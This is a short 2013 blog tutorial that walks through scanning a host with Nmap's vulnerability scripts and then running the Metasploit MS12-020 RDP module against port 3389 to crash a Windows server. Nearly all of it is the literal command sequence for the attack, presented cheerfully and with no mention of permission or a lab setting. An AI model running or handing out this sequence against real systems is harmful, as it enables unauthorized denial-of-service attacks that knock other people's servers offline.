Thursday, 30 May 2013

NMAP & Metasploit - Scan and Exploit in 10mins


First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn

Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command

#nmap --script vuln --reason

With this command, Nmap will execute the NSE script called Vuln and scan the host for vulnerabilities. Once the scan completed, we can see the result and show the available vulnerability of the host. The result even provide us with the link to know more information of the vulnerability.

Now lets exploit that vulnerability! So first we need to locate whether the exploit is in the metasploit database. On your terminal, run

#locate ms12_020

The output shows that the exploit is available in metasploit.

Alternatively, you can also search the exploit in the MSFconsole itself by firing up #msfconsole and then run
#search ms12_020

Now that we know the exploit is available, we will now execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST
msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf  auxiliary(ms12_020_maxchannelids) > run

Once executed, the server will crash!!! Note that this is a Layer 7 DOS attack!

1 comment: